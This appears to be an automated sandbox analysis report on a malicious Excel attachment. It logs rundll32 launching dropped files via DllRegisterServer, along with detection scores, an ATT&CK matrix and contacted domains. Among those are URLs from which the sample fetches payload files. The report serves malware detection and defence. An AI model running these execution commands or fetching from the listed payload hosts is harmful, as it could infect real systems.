Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{0EEEA97B-6DAB-4BB5-9CD1-5639B4D7F2C3} - OProcSessId.datJump to behavior
Source: Complaint-1091191320-02182021.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: Complaint-1091191320-02182021.xlsVirustotal: Detection: 8%
Source: Complaint-1091191320-02182021.xlsMetadefender: Detection: 13%
Source: Complaint-1091191320-02182021.xlsReversingLabs: Detection: 37%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 0000000B.00000002.294021431.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.324799063.0000000004CD0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.316492576.0000000000D40000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.310106337.0000000000B10000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 0000000B.00000002.294021431.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.324799063.0000000004CD0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.316492576.0000000000D40000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.310106337.0000000000B10000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 0000000B.00000002.294021431.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.324799063.0000000004CD0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.316492576.0000000000D40000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.310106337.0000000000B10000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 0000000B.00000002.294021431.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.324799063.0000000004CD0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.316492576.0000000000D40000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.310106337.0000000000B10000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Complaint-1091191320-02182021.xls8%VirustotalBrowse
Complaint-1091191320-02182021.xls16%MetadefenderBrowse
Complaint-1091191320-02182021.xls38%ReversingLabsDocument-Excel.Trojan.AShadow

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
dindorf.com.ar4%VirustotalBrowse
miaovideo.com0%VirustotalBrowse
7ruzezendegi.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://7ruzezendegi.com/samsgtlfwzt/44249957660300900000.dat100%Avira URL Cloudmalware
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
http://dindorf.com.ar/ntpnttfypqs/44249957660300900000.dat0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
dindorf.com.ar
181.88.192.136
truefalseunknown
miaovideo.com
112.125.131.128
truefalseunknown
7ruzezendegi.com
185.159.153.72
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://7ruzezendegi.com/samsgtlfwzt/44249957660300900000.dattrue
  • Avira URL Cloud: malware
unknown
http://dindorf.com.ar/ntpnttfypqs/44249957660300900000.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
    high
    https://login.microsoftonline.com/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
      high
      https://shell.suite.office.com:1443C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
          high
          https://autodiscover-s.outlook.com/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
              high
              https://cdn.entity.C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                high
                https://wus2-000.contentsync.C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkeyC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                    high
                    https://powerlift.acompli.netC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                      high
                      https://cortana.aiC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                high
                                https://api.aadrm.com/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                      high
                                      https://cr.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                            high
                                            https://graph.ppe.windows.netC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                            high
                                                            https://graph.windows.netC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                    high
                                                                    http://suspend.pars.host/css/css.csssuspendedpage[1].htm.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                  high
